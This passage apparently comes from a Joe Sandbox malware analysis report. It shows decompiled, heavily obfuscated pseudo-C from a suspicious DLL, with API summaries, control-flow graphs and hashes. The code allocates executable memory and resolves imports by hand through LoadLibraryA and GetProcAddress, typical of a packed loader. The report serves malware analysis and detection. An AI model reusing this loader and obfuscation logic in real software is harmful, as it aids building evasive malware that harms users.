									_t349 =  *(_t303 + 0x1d4) & 0x0000ffff;
									_t363 =  *(_t386 + 0x30);
									_t372 =  *(_t386 + 0x14);
									_push( *((intOrPtr*)(_t303 + 0x100)) - _t382);
									 *((intOrPtr*)(_t386 + 0x3c)) = _t250;
									_push( *(_t303 + 0x13c) & _t349 & 0x0000ffff);
									_push( *((intOrPtr*)(_t386 + 0x54)) + 0x2749);
									_push(_t363 - 0x0000252e & _t382);
									_push(_t349 - 0x4da0);
									InitializeCriticalSection(_t372 ^ 0x000024ad);
									 *((intOrPtr*)(_t303 + 0x124)) = 0xffffd370;
									 *(_t303 + 0x48) =  *(_t303 + 0x48) ^ _t372 & 0x00002201;
									 *((intOrPtr*)(_t303 + 0x1c)) =  *((intOrPtr*)(_t303 + 0x1c)) + (_t372 - 0x00002ab3 &  *(_t386 + 0x44));
									 *((intOrPtr*)(_t303 + 0x3c)) =  *((intOrPtr*)(_t303 + 0x3c)) - _t363 * _t382;
								}
								goto L32;
							}
							_t366 =  *(_t368[0x75] + 0x80) ^ 0x00002ea5;
							while(_t366 < (_t368[0x15] & 0x0000ffff)) {
								_t383 =  *_t368;
								_t350 = _t368[0x1b];
								_t305 =  *(_t383 + 0x1c) * _t366 * 0x4cafdec8 + _t350;
								if(( !( *((intOrPtr*)(_t368[0x11] + 0x3c)) - 1) &  *((intOrPtr*)(_t350 + 0x10)) - 0x00000001 +  *((intOrPtr*)(_t368[0x11] + 0x3c))) == 0 ||  *((intOrPtr*)(_t305 + 0x14)) == 0 ||  *((intOrPtr*)(_t305 + 0x10)) == 0) {
									L24:
									_t366 = _t366 + 1;
									continue;
								} else {
									 *((intOrPtr*)(_t368[0x49] + 0x28)) =  *((intOrPtr*)(_t368[0x49] + 0x28)) + 0xffffe185 -  *((intOrPtr*)(_t383 + 0xd0));
									if( *(_t368[0x75] + 0x80) - 0x32d < _t368[0x5e]) {
										_t368[0x60] = _t368[0x60] | _t368[9] * 0x0000252e;
									}
									_t354 = 0x29b2;
									if(( *(_t368[0x22] + 0x1c) ^ 0x00000fb9) == 0x29b2) {
										L21:
										E6D508CD0( *((intOrPtr*)(_t305 + 0xc)) + _t368[0x10],  *((intOrPtr*)(_t305 + 0x14)) + _t368[8],  *((intOrPtr*)(_t305 + 0x10)));
										_t280 = _t368[0x24];
										_t386 = _t386 + 0xc;
										_t332 = 3;
										do {
											_t280 = _t280 * 0x29b3;
											_t332 = _t332 - 1;
										} while (_t332 != 0);
										_t368[0x24] = _t280;
										_t368[9] =  &(_t368[0x35]) * _t368[9];
										 *((intOrPtr*)(_t368[0x1d] + 0x90)) = _t368[0x4f] - 0x24ad;
										goto L24;
									} else {
										do {
											_t354 = _t354 + 1;
											 *(_t368[0x14] + 0x90) = _t368[0x69] | 0x000029b2;
										} while (_t354 != ( *(_t368[0x22] + 0x1c) ^ 0x00000fb9));
										goto L21;
									}
								}
							}
							 *((intOrPtr*)(_t368[0x49] + 0x24)) =  *((intOrPtr*)(_t368[0x49] + 0x24)) +  *((intOrPtr*)(_t368[0x75] + 0x168)) - 0x1e7b;
							goto L32;
						}
					}
					_t306 = _t368[0x2f] * 0x260d;
					_t339 = _t368[0x39];
					_t385 = _t368[0x14];
					do {
						_t339 = _t339 ^ _t306;
						_t343 = _t343 + 1;
						_t368[0x39] = _t339;
					} while (_t343 != ( *(_t385 + 0x1c) ^ 0x000002a0));
					_t299 =  *(_t387 + 0x40);
					_t374 =  *(_t387 + 0x14);
					goto L9;
				} else {
					_t340 = _t368[0x4c];
					_t356 = _t368[2] ^ 0x00002872;
					_t296 = _t211 -  *((intOrPtr*)(_t387 + 0x24));
					do {
						_t340 = _t340 + _t356;
						_t296 = _t296 - 1;
					} while (_t296 != 0);
					_t368[0x4c] = _t340;
					goto L5;
				}
			}









































            0x6d518a5b
            0x6d518a5f
            0x6d518a6e
            0x6d518a74
            0x6d518a7e
            0x6d518a8c
            0x6d518a90
            0x6d518a96
            0x6d518a9a
            0x6d518a9e
            0x6d518aa8
            0x6d518ab2
            0x6d518ac0
            0x6d518f54
            0x6d518f62
            0x6d518f62
            0x6d518acc
            0x6d518ad0
            0x6d518adc
            0x6d518add
            0x6d518ae4
            0x6d518aeb
            0x6d518aec
            0x6d518af3
            0x6d518af7
            0x6d518afe
            0x6d518b02
            0x6d518b03
            0x6d518b0a
            0x6d518b11
            0x6d518b18
            0x6d518b1f
            0x6d518b26
            0x6d518b2d
            0x6d518b34
            0x6d518b3d
            0x6d518b3f
            0x6d518b42
            0x6d518b4a
            0x6d518b57
            0x6d518b62
            0x6d518b68
            0x6d518b6e
            0x6d518b90
            0x6d518b9d
            0x6d518b9f
            0x6d518bac
            0x6d518bbf
            0x6d518bf1
            0x6d518bf4
            0x6d518c0b
            0x6d518c13
            0x6d518c19
            0x6d518c1f
            0x6d518c29
            0x6d518c3c
            0x6d518c3c
            0x6d518c4a
            0x6d518c58
            0x6d518c69
            0x6d518c7a
            0x6d518c83
            0x6d518c86
            0x6d518c91
            0x6d518f52
            0x00000000
            0x6d518c97
            0x6d518c97
            0x6d518c9f
            0x6d518e03
            0x6d518f2e
            0x6d518f36
            0x6d518f4c
            0x6d518f4c
            0x6d518e09
            0x6d518e18
            0x6d518e4d
            0x6d518e92
            0x6d518e9d
            0x6d518ea3
            0x6d518eae
            0x6d518eb1
            0x6d518eb7
            0x6d518ebe
            0x6d518ec2
            0x6d518ec6
            0x6d518ed1
            0x6d518ede
            0x6d518eeb
            0x6d518eec
            0x6d518ef3
            0x6d518efc
            0x6d518f0c
            0x6d518f16
            0x6d518f23
            0x6d518f26
            0x6d518f26
            0x00000000
            0x6d518e03
            0x6d518cb1
            0x6d518dc9
            0x6d518cbc
            0x6d518cbe
            0x6d518cd3
            0x6d518ce2
            0x6d518dc8
            0x6d518dc8
            0x00000000
            0x6d518cfc
            0x6d518d0d
            0x6d518d27
            0x6d518d30
            0x6d518d30
            0x6d518d41
            0x6d518d4d
            0x6d518d73
            0x6d518d84
            0x6d518d89
            0x6d518d8f
            0x6d518d94
            0x6d518d95
            0x6d518d95
            0x6d518d9b
            0x6d518d9b
            0x6d518da6
            0x6d518dbc
            0x6d518dc2
            0x00000000
            0x6d518d4f
            0x6d518d4f
            0x6d518d5a
            0x6d518d5b
            0x6d518d6f
            0x00000000
            0x6d518d4f
            0x6d518d4d
            0x6d518ce2
            0x6d518dec
            0x00000000
            0x6d518dec
            0x6d518c91
            0x6d518bc1
            0x6d518bcb
            0x6d518bd1
            0x6d518bd4
            0x6d518bd4
            0x6d518bd6
            0x6d518bd7
            0x6d518be5
            0x6d518be9
            0x6d518bed
            0x00000000
            0x6d518b70
            0x6d518b73
            0x6d518b79
            0x6d518b7f
            0x6d518b83
            0x6d518b83
            0x6d518b85
            0x6d518b85
            0x6d518b8a
            0x00000000
            0x6d518b8a

            APIs
            • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6D518C19
              • Part of subcall function 6D506BBA: LoadLibraryA.KERNEL32(?,?,?,?,?,6D502E8B,?,?,?,?,?,?,?,?,?,?), ref: 6D506C04
            • InitializeCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 6D518EFC
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AllocCriticalInitializeLibraryLoadSectionVirtual
            • String ID: .%
            • API String ID: 485185432-31117204
            • Opcode ID: 16ffec23eec426799c00ab9f6824433f2cffe1da31990c24cdaf012809271147
            • Instruction ID: 6a74e3a7684b45281df08fdef07ccf0abe93fc0b371ee74bb2a2e449667a4166
            • Opcode Fuzzy Hash: 16ffec23eec426799c00ab9f6824433f2cffe1da31990c24cdaf012809271147
            • Instruction Fuzzy Hash: 67E126716047059FD328CF28C985AABB7F9FF88304F044A6EEA9A8B651D734F944CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D505A34 Relevance: 3.3, APIs: 2, Instructions: 301libraryloaderCOMMONCrypto
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 65 6d505a34-6d505a51 66 6d505a57-6d505a60 65->66 67 6d505e9d-6d505eb7 65->67 68 6d505a62-6d505a68 66->68 69 6d505a7e-6d505a9d 66->69 70 6d505a6e-6d505a76 68->70 71 6d505abb-6d505add 69->71 72 6d505a9f 69->72 70->70 73 6d505a78 70->73 75 6d505e7f-6d505e88 71->75 74 6d505aa2-6d505ab9 72->74 73->69 74->71 74->74 76 6d505ae2-6d505af6 LoadLibraryA 75->76 77 6d505e8e-6d505e9c 75->77 78 6d505e6b-6d505e79 76->78 79 6d505afc-6d505b27 76->79 77->67 78->75 80 6d505b45-6d505b67 79->80 81 6d505b29-6d505b35 79->81 82 6d505b69-6d505b74 80->82 83 6d505b7a-6d505b8b 80->83 84 6d505b3b-6d505b40 81->84 82->83 85 6d505b94-6d505ba2 83->85 86 6d505b8d-6d505b8f 83->86 84->84 87 6d505b42 84->87 89 6d505bb2-6d505bc2 85->89 90 6d505ba4-6d505bac 85->90 88 6d505c4b-6d505c50 86->88 87->80 93 6d505c56-6d505c65 88->93 94 6d505e4b-6d505e56 88->94 91 6d505bc4-6d505bc7 89->91 92 6d505bde-6d505c04 89->92 90->89 96 6d505bcd-6d505bdc 91->96 97 6d505c06-6d505c0c 92->97 98 6d505c27-6d505c3f 92->98 95 6d505c69-6d505c71 93->95 94->78 99 6d505e58-6d505e65 94->99 100 6d505c77-6d505c8a 95->100 101 6d505d7d-6d505d92 95->101 96->92 96->96 102 6d505c12-6d505c25 97->102 98->88 103 6d505c41 98->103 99->78 104 6d505c8c-6d505cad 100->104 105 6d505caf-6d505cec 100->105 106 6d505d94-6d505d9c 101->106 107 6d505dac-6d505dc0 101->107 102->98 102->102 103->88 104->104 104->105 110 6d505d02-6d505d22 105->110 111 6d505cee-6d505cf8 105->111 112 6d505d9e-6d505da7 106->112 108 6d505dd0-6d505e01 GetProcAddress 107->108 109 6d505dc2-6d505dcd 107->109 114 6d505e03-6d505e1a 108->114 115 6d505e2d-6d505e45 108->115 109->108 117 6d505d30-6d505d52 110->117 118 6d505d24-6d505d2a 110->118 116 6d505cfa-6d505cfd 111->116 112->112 113 6d505da9 112->113 113->107 119 6d505e1c-6d505e21 114->119 115->94 115->95 116->116 120 6d505cff 116->120 121 6d505d71-6d505d78 117->121 122 6d505d54 117->122 118->117 119->119 123 6d505e23 119->123 120->110 125 6d505e29 121->125 124 6d505d5a-6d505d6f 122->124 123->125 124->121 124->124 125->115
            C-Code - Quality: 100%
            			E6D505A34() {
				struct HINSTANCE__* _t181;
				void* _t207;
				void* _t217;
				void* _t226;
				void* _t229;
				signed int _t230;
				void* _t236;
				signed int _t248;
				signed int _t253;
				signed short* _t258;
				signed short* _t259;
				void* _t261;
				struct HINSTANCE__* _t262;
				intOrPtr _t263;
				signed int _t264;
				signed int _t265;
				signed int _t268;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr _t275;
				signed int _t276;
				signed int _t280;
				void* _t284;
				intOrPtr _t286;
				void* _t288;
				void* _t291;
				signed int _t293;
				signed int _t294;
				void* _t296;
				signed int _t297;
				void* _t298;
				void* _t299;
				signed int _t300;
				void* _t301;
				void* _t302;
				signed int _t304;
				void* _t305;
				intOrPtr _t307;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				intOrPtr _t313;
				struct HINSTANCE__* _t314;
				intOrPtr _t316;
				intOrPtr _t317;
				struct HINSTANCE__* _t318;
				void* _t320;
				signed int _t321;
				intOrPtr _t323;
				signed int _t326;
				intOrPtr* _t327;
				intOrPtr* _t331;
				signed short* _t333;
				void* _t335;

				_t327 =  *((intOrPtr*)(_t335 + 0x14));
				if( *((intOrPtr*)( *( *((intOrPtr*)(_t327 + 0x74)) + 0x80) * 0x46204968 +  *((intOrPtr*)(_t327 + 0x70)) + 0x78)) == 0) {
					L60:
					 *( *((intOrPtr*)(_t327 + 0x50)) + 0x90) =  *( *((intOrPtr*)(_t327 + 0x50)) + 0x90) |  *((intOrPtr*)(_t327 + 0x124)) + 0x00002ab3;
					return 0;
				}
				_t268 =  *(_t327 + 0x1c);
				if(_t268 == 0x260c) {
					L5:
					_t313 =  *((intOrPtr*)(_t327 + 0x88));
					_t299 = 0x24ad;
					if( *((intOrPtr*)(_t313 + 0x80)) - 0x9f6 <= 0x24ad) {
						L8:
						 *(_t327 + 0x48) =  *(_t327 + 0x48) |  *(_t327 + 0xc4) + 0x000024ad;
						_t331 =  *((intOrPtr*)( *( *((intOrPtr*)(_t327 + 0x1d4)) + 0x1c) * 0x75bcc628 +  *((intOrPtr*)(_t327 + 0x70)) + 0x78)) +  *((intOrPtr*)(_t327 + 0x40));
						while(1) {
							_t270 =  *((intOrPtr*)(_t331 + 0xc));
							 *((intOrPtr*)(_t335 + 0x14)) = _t331;
							if(_t270 == 0) {
								break;
							}
							_t181 = LoadLibraryA( *((intOrPtr*)(_t327 + 0x40)) + _t270); // executed
							_t314 = _t181;
							 *(_t335 + 0x20) = _t314;
							if(_t314 == 0) {
								L57:
								_t331 = _t331 + 0x14;
								 *(_t327 + 0x90) =  *((intOrPtr*)(_t327 + 0xbc)) - 0x29d1;
								continue;
							}
							_t258 =  *((intOrPtr*)(_t331 + 0x10)) +  *((intOrPtr*)(_t327 + 0x40));
							 *(_t335 + 0x10) = _t258;
							 *((intOrPtr*)(_t327 + 0x100)) =  *((intOrPtr*)(_t327 + 0x100)) + ( *( *((intOrPtr*)(_t327 + 0x1d4)) + 0x1a8) | 0x000028a4);
							_t274 =  *((intOrPtr*)(_t327 + 0x4c));
							if(_t274 == 0x260c) {
								L14:
								_t300 =  *(_t335 + 0x28);
								 *(_t327 + 0x90) =  *(_t327 + 0x90) - ( *(_t327 + 0x5c) | _t300);
								if(( *( *_t327 + 0x80) ^ 0x00000f4c) >  *((intOrPtr*)(_t327 + 0xbc))) {
									 *( *((intOrPtr*)(_t327 + 8)) + 0xc4) =  *( *((intOrPtr*)(_t327 + 8)) + 0xc4) ^  *((intOrPtr*)(_t327 + 0x80)) - _t300;
								}
								_t275 =  *((intOrPtr*)(_t327 + 0x1d4));
								if( *_t331 != ( *(_t275 + 0x1c) ^ 0x0000260d)) {
									if( *((intOrPtr*)(_t327 + 0xd0)) != ( *(_t275 + 0x4c) ^ 0x000038e3)) {
										 *((intOrPtr*)(_t327 + 0x1a0)) =  *(_t327 + 0x48) - 0x2ab3;
									}
									_t316 =  *_t327;
									_t301 = 0x2749;
									if( *(_t316 + 0x1c) * 0x2aa0932d <= 0x2749) {
										L23:
										_t302 = 0x2749;
										_t317 =  *((intOrPtr*)(_t327 + 0x74));
										 *((intOrPtr*)(_t327 + 0xd0)) =  *((intOrPtr*)(_t327 + 0xbc)) - 0x252e;
										_t333 =  *_t331 +  *((intOrPtr*)(_t327 + 0x40));
										if( *((intOrPtr*)(_t317 + 0x2c)) == 0x2871) {
											L26:
											_t258 =  *(_t335 + 0x10);
											_t318 =  *(_t335 + 0x20);
											if( *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x10)) + 0x1c)) + 0x3a5 >= 0x2ea5) {
												 *((intOrPtr*)(_t327 + 0xf8)) = 0x4dbae75;
											}
											goto L28;
										}
										_t293 =  *(_t327 + 0x190);
										_t264 = _t327 + 0x158;
										do {
											_t293 = _t293 ^ _t264;
											_t302 = _t302 + 1;
											 *(_t327 + 0x190) = _t293;
										} while (_t302 !=  *((intOrPtr*)(_t317 + 0x2c)) - 0x128);
										goto L26;
									} else {
										_t294 =  *(_t327 + 0x28);
										_t265 = _t327 + 0x1a8;
										do {
											_t294 = _t294 ^ _t265;
											_t301 = _t301 + 1;
											 *(_t327 + 0x28) = _t294;
										} while (_t301 <  *(_t316 + 0x1c) * 0x2aa0932d);
										goto L23;
									}
								} else {
									_t333 = _t258;
									L28:
									_t276 =  *_t333;
									if(_t276 == 0) {
										L55:
										_t331 =  *((intOrPtr*)(_t335 + 0x14));
										if( *(_t327 + 0x1c) > 0x2b78) {
											 *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x50)) + 0x1a0)) =  *(_t335 + 0x28) + 0x1eee;
										}
										goto L57;
									}
									_t259 = _t258 - _t333;
									 *(_t335 + 0x18) =  *(_t335 + 0x24) | 0x00001e7b;
									 *(_t335 + 0x10) = _t259;
									do {
										if((_t276 &  *(_t327 + 0x1c) << 0x0000001f) == 0) {
											_t320 =  *((intOrPtr*)(_t327 + 0x40)) + _t276;
											_t207 =  *((intOrPtr*)( *((intOrPtr*)(_t327 + 8)) + 0x1c)) - 0x424;
											if(_t207 > 0x21e9) {
												L47:
												if(( *( *((intOrPtr*)(_t327 + 0x1d4)) + 0x1c) ^ 0x00003bfe) <=  *((intOrPtr*)(_t327 + 0xd8))) {
													 *((intOrPtr*)( *_t327 + 0x48)) =  *((intOrPtr*)( *_t327 + 0x48)) - ( *(_t335 + 0x24) | 0x00002ea5);
												}
												_t318 =  *(_t335 + 0x20);
												 *((intOrPtr*)(_t259 + _t333)) = GetProcAddress(_t318, _t320 + 2);
												 *(_t327 + 0x24) =  *(_t327 + 0x104) * 0x1e7b;
												_t280 =  *( *((intOrPtr*)(_t327 + 0x74)) + 0x4c) ^ 0x000007e4;
												if(_t280 <= 0x21ea) {
													_t308 =  *(_t327 + 0x130);
													_t326 =  *((intOrPtr*)(_t327 + 0x168)) + 0xffffd62f;
													_t217 = 0x21eb - _t280;
													do {
														_t308 = _t308 ^ _t326;
														_t217 = _t217 - 1;
													} while (_t217 != 0);
													 *(_t327 + 0x130) = _t308;
													L53:
													_t318 =  *(_t335 + 0x20);
												}
												goto L54;
											}
											_t309 =  *(_t327 + 0x24);
											_t284 = 0x21ea - _t207;
											do {
												_t309 = _t309 * 0x2ab4;
												_t284 = _t284 - 1;
											} while (_t284 != 0);
											 *(_t327 + 0x24) = _t309;
											goto L47;
										}
										_t305 = 0x2c90;
										if( *( *((intOrPtr*)(_t327 + 0x74)) + 0x2c) * 0x5eafc6a6 <= 0x2c90) {
											L33:
											_t286 =  *((intOrPtr*)(_t327 + 8));
											 *(_t327 + 0x48) =  *(_t327 + 0x48) |  *(_t286 + 0xd4) *  *(_t335 + 0x28);
											_t261 =  *((intOrPtr*)(_t318 + 0x3c)) + _t318;
											 *((intOrPtr*)(_t286 + 0x30)) =  *((intOrPtr*)(_t286 + 0x30)) +  *(_t327 + 0x190) * 0x1eee;
											_t321 =  *(_t327 + 0x1c);
											_t288 =  *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x50)) + 0x80)) - 0x9f8;
											_t226 = _t321 - 0x160;
											if(_t288 == _t226) {
												L37:
												_t262 =  *(_t335 + 0x20);
												_t229 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x78)) + _t262 + 0x1c)) + (( *_t333 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x78)) + _t262 + 0x10))) * 4;
												if( *((intOrPtr*)(_t327 + 0x110)) != 0x1e7b) {
													 *(_t327 + 0x130) = _t321 | 0x00002c90;
												}
												_t230 =  *(_t327 + 0x48);
												_t307 =  *((intOrPtr*)(_t229 + _t262)) + _t262;
												_t263 =  *((intOrPtr*)(_t327 + 0x74));
												_t291 = 0x2ab3;
												 *(_t327 + 0x28) = _t230;
												 *(_t327 + 0x48) = _t230 + 1;
												if( *(_t263 + 0x1c) * 0x86df5549 <= 0x2ab3) {
													L42:
													_t259 =  *(_t335 + 0x10);
													 *((intOrPtr*)(_t259 + _t333)) = _t307;
													goto L53;
												} else {
													_t323 =  *((intOrPtr*)(_t327 + 0x1d4));
													do {
														_t291 = _t291 + 1;
														 *(_t327 + 0x24) =  *(_t323 + 0x24) | 0x000029b2;
													} while (_t291 <  *(_t263 + 0x1c) * 0x86df5549);
													goto L42;
												}
											}
											_t311 =  *((intOrPtr*)(_t327 + 0x80)) -  *(_t335 + 0x28);
											_t236 = _t226 - _t288;
											do {
												_t236 = _t236 - 1;
											} while (_t236 != 0);
											 *(_t327 + 0x30) = _t311;
											goto L37;
										} else {
											goto L32;
										}
										do {
											L32:
											 *( *((intOrPtr*)(_t327 + 0x10)) + 0x90) =  *( *((intOrPtr*)(_t327 + 0x10)) + 0x90) ^  *(_t327 + 0x158) - 0x00002597;
											_t305 = _t305 + 1;
										} while (_t305 <  *( *((intOrPtr*)(_t327 + 0x74)) + 0x2c) * 0x5eafc6a6);
										goto L33;
										L54:
										_t333 =  &(_t333[2]);
										 *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x88)) + 0xc4)) =  *((intOrPtr*)( *((intOrPtr*)(_t327 + 0x88)) + 0xc4)) +  *(_t335 + 0x18);
										_t276 =  *_t333;
									} while (_t276 != 0);
									goto L55;
								}
							}
							_t248 =  *(_t327 + 0x30);
							_t304 =  *(_t327 + 0x28) + 0xffffde17;
							_t296 = _t274 + 0xffffd9f4;
							do {
								_t248 = _t248 | _t304;
								_t296 = _t296 - 1;
							} while (_t296 != 0);
							 *(_t327 + 0x30) = _t248;
							goto L14;
						}
						 *(_t327 + 0x90) =  *(_t327 + 0x90) | _t327 + 0x00000114;
						goto L60;
					}
					_t297 =  *(_t327 + 0x48);
					do {
						_t297 = _t297 +  *(_t327 + 0x28) -  *(_t335 + 0x24);
						_t299 = _t299 + 1;
						 *(_t327 + 0x48) = _t297;
					} while (_t299 <  *((intOrPtr*)(_t313 + 0x80)) - 0x9f6);
					goto L8;
				} else {
					_t253 =  *(_t327 + 0xc4);
					_t298 = _t268 + 0xffffd9f4;
					do {
						_t253 = _t253 ^ 0x00002dbf;
						_t298 = _t298 - 1;
					} while (_t298 != 0);
					 *(_t327 + 0xc4) = _t253;
					goto L5;
				}
			}

























































            0x6d505a38
            0x6d505a51
            0x6d505e9d
            0x6d505eac
            0x6d505eb7
            0x6d505eb7
            0x6d505a57
            0x6d505a60
            0x6d505a7e
            0x6d505a81
            0x6d505a91
            0x6d505a9d
            0x6d505abb
            0x6d505ac3
            0x6d505ada
            0x6d505e7f
            0x6d505e7f
            0x6d505e82
            0x6d505e88
            0x00000000
            0x00000000
            0x6d505ae8
            0x6d505aee
            0x6d505af0
            0x6d505af6
            0x6d505e6b
            0x6d505e76
            0x6d505e79
            0x00000000
            0x6d505e79
            0x6d505b05
            0x6d505b08
            0x6d505b18
            0x6d505b1e
            0x6d505b27
            0x6d505b45
            0x6d505b48
            0x6d505b4e
            0x6d505b67
            0x6d505b74
            0x6d505b74
            0x6d505b7a
            0x6d505b8b
            0x6d505ba2
            0x6d505bac
            0x6d505bac
            0x6d505bb2
            0x6d505bb4
            0x6d505bc2
            0x6d505bde
            0x6d505be4
            0x6d505be9
            0x6d505bf1
            0x6d505bfa
            0x6d505c04
            0x6d505c27
            0x6d505c2a
            0x6d505c2e
            0x6d505c3f
            0x6d505c41
            0x6d505c41
            0x00000000
            0x6d505c3f
            0x6d505c06
            0x6d505c0c
            0x6d505c12
            0x6d505c12
            0x6d505c14
            0x6d505c15
            0x6d505c23
            0x00000000
            0x6d505bc4
            0x6d505bc4
            0x6d505bc7
            0x6d505bcd
            0x6d505bcd
            0x6d505bcf
            0x6d505bd0
            0x6d505bda
            0x00000000
            0x6d505bcd
            0x6d505b8d
            0x6d505b8d
            0x6d505c4b
            0x6d505c4b
            0x6d505c50
            0x6d505e4b
            0x6d505e52
            0x6d505e56
            0x6d505e65
            0x6d505e65
            0x00000000
            0x6d505e56
            0x6d505c5f
            0x6d505c61
            0x6d505c65
            0x6d505c69
            0x6d505c71
            0x6d505d83
            0x6d505d88
            0x6d505d92
            0x6d505dac
            0x6d505dc0
            0x6d505dcd
            0x6d505dcd
            0x6d505dd3
            0x6d505ddf
            0x6d505dec
            0x6d505df5
            0x6d505e01
            0x6d505e0e
            0x6d505e14
            0x6d505e1a
            0x6d505e1c
            0x6d505e1c
            0x6d505e1e
            0x6d505e1e
            0x6d505e23
            0x6d505e29
            0x6d505e29
            0x6d505e29
            0x00000000
            0x6d505e01
            0x6d505d94
            0x6d505d9c
            0x6d505d9e
            0x6d505d9e
            0x6d505da4
            0x6d505da4
            0x6d505da9
            0x00000000
            0x6d505da9
            0x6d505c7f
            0x6d505c8a
            0x6d505caf
            0x6d505caf
            0x6d505cbd
            0x6d505ccd
            0x6d505ccf
            0x6d505cd5
            0x6d505cde
            0x6d505ce4
            0x6d505cec
            0x6d505d02
            0x6d505d05
            0x6d505d1f
            0x6d505d22
            0x6d505d2a
            0x6d505d2a
            0x6d505d38
            0x6d505d3b
            0x6d505d3d
            0x6d505d40
            0x6d505d42
            0x6d505d46
            0x6d505d52
            0x6d505d71
            0x6d505d71
            0x6d505d75
            0x00000000
            0x6d505d54
            0x6d505d54
            0x6d505d5a
            0x6d505d62
            0x6d505d63
            0x6d505d6d
            0x00000000
            0x6d505d5a
            0x6d505d52
            0x6d505cf4
            0x6d505cf8
            0x6d505cfa
            0x6d505cfa
            0x6d505cfa
            0x6d505cff
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x6d505c8c
            0x6d505c8c
            0x6d505c9a
            0x6d505ca0
            0x6d505cab
            0x00000000
            0x6d505e2d
            0x6d505e33
            0x6d505e3a
            0x6d505e40
            0x6d505e43
            0x00000000
            0x6d505c69
            0x6d505b8b
            0x6d505b2c
            0x6d505b2f
            0x6d505b35
            0x6d505b3b
            0x6d505b3b
            0x6d505b3d
            0x6d505b3d
            0x6d505b42
            0x00000000
            0x6d505b42
            0x6d505e95
            0x00000000
            0x6d505e9c
            0x6d505a9f
            0x6d505aa2
            0x6d505aa9
            0x6d505aab
            0x6d505aac
            0x6d505ab7
            0x00000000
            0x6d505a62
            0x6d505a62
            0x6d505a68
            0x6d505a6e
            0x6d505a6e
            0x6d505a73
            0x6d505a73
            0x6d505a78
            0x00000000
            0x6d505a78

            APIs
            • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?), ref: 6D505AE8
            • GetProcAddress.KERNEL32(?,?), ref: 6D505DD9
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2e195d9e2f59183d4d548d5c05f167967addbee4d06f428e3343c9ebd5cc489a
            • Instruction ID: fb470fca57dd8ff979601d5b73603b900a060ec3a1902aef3828cc961d297b62
            • Opcode Fuzzy Hash: 2e195d9e2f59183d4d548d5c05f167967addbee4d06f428e3343c9ebd5cc489a
            • Instruction Fuzzy Hash: B7E10471600B018FD728CF29C594AA6B7F1FF88304F158A6EE99A8BB95D730F945CB41
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50E224 Relevance: 3.1, APIs: 2, Instructions: 67COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 126 6d50e224-6d50e229 127 6d50e22b-6d50e243 126->127 128 6d50e251-6d50e25a 127->128 129 6d50e245-6d50e249 127->129 131 6d50e26c 128->131 132 6d50e25c-6d50e25f 128->132 129->128 130 6d50e24b-6d50e24f 129->130 133 6d50e2cc-6d50e2d0 130->133 136 6d50e26e-6d50e27b GetStdHandle 131->136 134 6d50e261-6d50e266 132->134 135 6d50e268-6d50e26a 132->135 133->127 137 6d50e2d6-6d50e2d9 133->137 134->136 135->136 138 6d50e28a 136->138 139 6d50e27d-6d50e27f 136->139 141 6d50e28c-6d50e28e 138->141 139->138 140 6d50e281-6d50e288 GetFileType 139->140 140->141 142 6d50e290-6d50e29b 141->142 143 6d50e2ae-6d50e2c0 141->143 145 6d50e2a3-6d50e2a6 142->145 146 6d50e29d-6d50e2a1 142->146 143->133 144 6d50e2c2-6d50e2c5 143->144 144->133 145->133 147 6d50e2a8-6d50e2ac 145->147 146->133 147->133
            C-Code - Quality: 84%
            			E6D50E224() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed int _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x30 +  *((intOrPtr*)(0x6d55dda0 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
